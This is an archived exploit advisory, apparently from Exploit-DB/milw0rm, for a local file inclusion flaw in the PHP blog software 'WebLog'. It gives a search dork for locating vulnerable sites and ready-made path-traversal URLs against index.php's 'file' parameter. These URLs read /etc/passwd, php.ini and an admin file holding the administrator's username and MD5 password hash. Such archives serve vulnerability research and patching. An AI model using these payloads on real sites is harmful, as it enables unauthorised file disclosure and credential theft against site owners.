WebLog - 'index.php' Remote File Disclosure

EDB-ID:

3484

Author:

Dj7xpl

Type:

webapps

Platform:

PHP

Published:

2007-03-15

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :   http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
#
#
#   Exploit :   http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :   http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
#               http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
#               http://localhost/blog/index.php?show=showarticles&file=../admin.php   <<< username&password(md5)        
#    
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]